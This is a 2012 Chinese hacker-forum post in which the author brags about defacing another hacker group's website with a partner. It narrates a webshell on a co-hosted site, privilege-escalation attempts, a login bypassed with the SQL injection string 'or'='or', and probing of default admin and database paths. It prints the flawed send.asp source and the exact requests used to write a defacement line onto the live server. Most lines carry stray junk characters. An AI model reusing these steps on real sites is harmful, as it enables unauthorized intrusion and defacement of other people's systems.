|
|
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量
/ M- Y7 h8 }+ g( M今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程
- \+ S& Z# u+ O* q9 r- y这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来% m! P9 W3 n. ?5 E
我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东
5 r7 ^4 B& \# Z, B6 l" A* N首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的+ J/ c% q7 p3 k f
服务器应该防ARP,不过这还只是猜测
9 M8 P+ j: A5 i' d6 J! Z云中鸡说先不搞C段,PZ一下再说7 v) x3 i" `& x' Q
然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]5 g; C, n0 Z: I- m0 K
一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............
5 n F. `$ o) x# D6 N: G; B这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell
, `* h9 n; Y7 Y9 [% J我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT; u% [+ X8 O$ O ^9 y2 _
然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn
, L9 z8 ?+ u: r0 ?+ x看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟0 M8 @: i1 K7 p- \, W ?- |5 O G
问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............
C9 Y! U7 s- {5 m+ k无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~. F5 _9 X4 M; m
然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么$ u; W6 }, J: y3 m3 A
打开一看,如图1所示。( w2 M# v5 V0 a. f! |' g- V8 o
& l. e* M& T: r3 ?$ w! x- K3 K; w
http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg' l# W* c+ n4 R7 p0 R6 O% P
我靠~~这啥东西?这么帅?点进去一看,如图2所示。
X' L) G" G6 j3 a+ \* O5 V# c3 i0 Y. C6 E( M6 P
http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg. a* F/ A# {+ _2 ?! }
太帅了,真YD!!
: Y1 X- M, B$ o% J s: i% s! |这个页面应该是一套个人主页程序,而且还挺炫的!
/ |1 Q" |# }* Y6 S+ S4 }这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。
1 l: I* e$ ?! _3 @; P& G2 N* W) ~+ j A7 M, A' _
http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg) p2 H4 G8 a3 R& f' t; A' X
嘿嘿,试着'or'='or'居然进去了!!如图4所示。
. S# b& [6 Z0 C; l& Q% H* s' } f6 \, W7 T J4 V; z
http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg% n6 l- F% V' `$ x% ]; b3 @
经过半个多小时的摸索,还是没有发现可利用的地方。
8 d) Q+ p% r5 i/ X+ [这下郁闷了,不管了,把这套程序下载下来看看吧8 a6 I T6 q2 ~ n
找了一会才知道这套程序叫做“V时代个人flash主页”/ a- u, ^/ n" f6 N1 ?+ ]
到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用! o3 [+ H4 F h7 `( l# F
于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]]
% D5 e) B# Z& L% U- ]* i返回的确实找不到页面,郁闷了,输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]1 o: g7 m* r) m0 i
同样是找不到页面,真晕!再看看!7 _5 e: [0 A0 D5 _1 ?- R
5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!
( f" @# V/ B0 g马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!
9 U, J' |. v/ b* s# @' K打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了!
3 j7 e9 h$ S- p( p7 l X希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:5 @5 P7 l" A4 J# L F
. L* ?+ v. u1 H8 ]0 pvar a
! R; |2 F: V- v. a1 y) x- ]var b* u3 x8 a: h( W8 K* ]
var tx9 ]& ^/ k9 k; q$ S$ R' G9 T
var clean g0 ~- m% j; _
a=Request("re")
( C5 J7 E# _8 z; |clean=Request("clean")
& f$ h; g' `# n( d# @ l! Yvar jian="test.txt"* n: j. k) N0 I. {% B& k! W
& U6 \6 z) V& e$ F+ l7 u
if(clean==1){
) v8 I& y3 v) w8 ^) r# o7 Atx="&a="1 Z& p5 m2 h _$ ^4 u+ E
var fs2
' F4 v. x) z& c3 X8 U4 V+ k ovar fs2=Server.CreateObject("Scripting.FileSystemObject")
, y1 i1 X7 ]" N& Avar newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)& s: w& G; ~# j& g( ~
newdt.WriteLine("&a=")6 D% i* V, n ~& d5 e6 e4 H5 D) \
newdt.close()( ^- V7 }( M1 }5 K$ p( i4 w9 Z
}
4 X5 a6 O( Z8 x; A% O; q0 a/ N! z# L( |/ ~4 x
if(clean==0|clean==1){* \: Y8 e0 S# M2 G, K
tx=""+ B/ L; f5 O' {+ z% Y7 h
var fso = Server.Createobject("Scripting.FileSystemObject"). Y; Q+ T. s" b: o1 k ~' U
var file = fso.OpenTextFile(Server.Mappath(jian))
) r9 Y3 O2 g" d2 \' \( d9 xwhile (!file.AtEndOfStream){. Z* ^6 d8 n% g4 U; e, t" O# ?$ E+ Y
tx=file.ReadLine()
% L% I$ W# j2 h8 }2 m* z8 P7 pResponse.write (tx)! s, Y2 y5 r5 {$ U
}$ J% N4 D. s# \: }+ X1 h
Response.write ("&")
$ Y4 z& w. {( }7 |- f# E5 P lfile.close() O; b! R" k3 T
}
$ ~7 m2 e8 f. y: y; Q) G2 [* S* V1 i5 g
if(clean==2){% w' K9 c0 N8 w" H4 p$ x; x& m# D: b
tx=""
/ i' g# |- v: a$ K0 |) w) S* r- Bvar fso = Server.Createobject("Scripting.FileSystemObject"); r( m7 ]6 O- C, a
var file = fso.OpenTextFile(Server.Mappath(jian))
/ P7 Q" ?% r0 @ k9 U7 E* x/ I$ b- y, ~" H" K" ?7 D5 M# O4 n& E
var fs2
& n8 U) {& g- ovar fs2=Server.CreateObject("Scripting.FileSystemObject")0 Z% p* u# b4 b6 U
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)- u; M0 z! A/ f8 Y5 I
# V1 D9 Y$ x, a+ \, R5 z9 p3 c0 t: f2 o7 L# V) s3 C" j
while (!file.AtEndOfStream){
' B- h) C# l& D8 r# J# Z$ U" Btx=file.ReadLine()$ \5 [+ }, @( r6 i3 A9 n
Response.write (tx)}8 ^* b' g* @/ r
/ ]8 R _) r* z0 j* q5 Y" A
Response.write (a+"&")
. g( h5 r* `$ y1 K- I, m& K; ynewdt.WriteLine(a)
, C$ s% R" k! b# @" }! A8 ?
- \3 }' K# |) ?0 f' d2 cfile.close()
2 U; @# Z i' ^* i5 [newdt.close()' y/ S/ }' q& j* h7 }7 D$ r& u+ W
}5 C' p9 w& p; i) Y
. G0 D& T% t6 E+ S2 Z6 n2 U; \8 |1 l) h, J: d( E4 R
复制代码
' v- v3 u8 m/ X2 A S这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”
6 w% L, P* ^" h: N1 k h接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”+ ?& u6 f4 n* q8 z& y0 r
这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
$ k' B4 l# Y3 r, }: u' d过程如图5、6所示。
4 q2 E9 n" e* s0 Q
3 d" y8 @) h j0 A dhttp://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg
* N! k# y* `6 J4 z 1 ?; F9 X9 k, }, P( `# c
http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg7 D! ]7 t' F W/ U
提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。
6 ]0 B, P5 k: c' m$ l2 V* y- [9 Y* M9 O+ s- A
http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg$ z5 [' J' a' e: [* X
这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的$ K0 J5 ]: {8 |6 r+ ?( F3 X- m
如果jian是经过request取值的话,同样也能搞到shell。
0 x2 L. ~) e% r9 O4 p; E这次只是装到了X,并没有拿到shell
9 [% T3 T8 D3 @3 [- n4 [ m% s已经是凌晨了,跟云中J说了声就睡觉去鸟6 ~: E* C9 b9 }" a5 ]
估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙' v# F8 u' V4 \; c
就到这里吧,没技术含量,纯粹装X,高手们见笑了
. c, p e: I: d) {另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己
& H0 |9 U0 K& c+ g! g" f1 \/ u3 Y自己学不到技术,却还在自欺欺人4 t5 ^2 M6 G8 T0 b# r
不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~
- k5 n0 d5 L! t+ Y! B6 A( o5 y/ D- m- g+ E
|
|
发表于 2012-11-6 21:06:10
收藏
支持
反对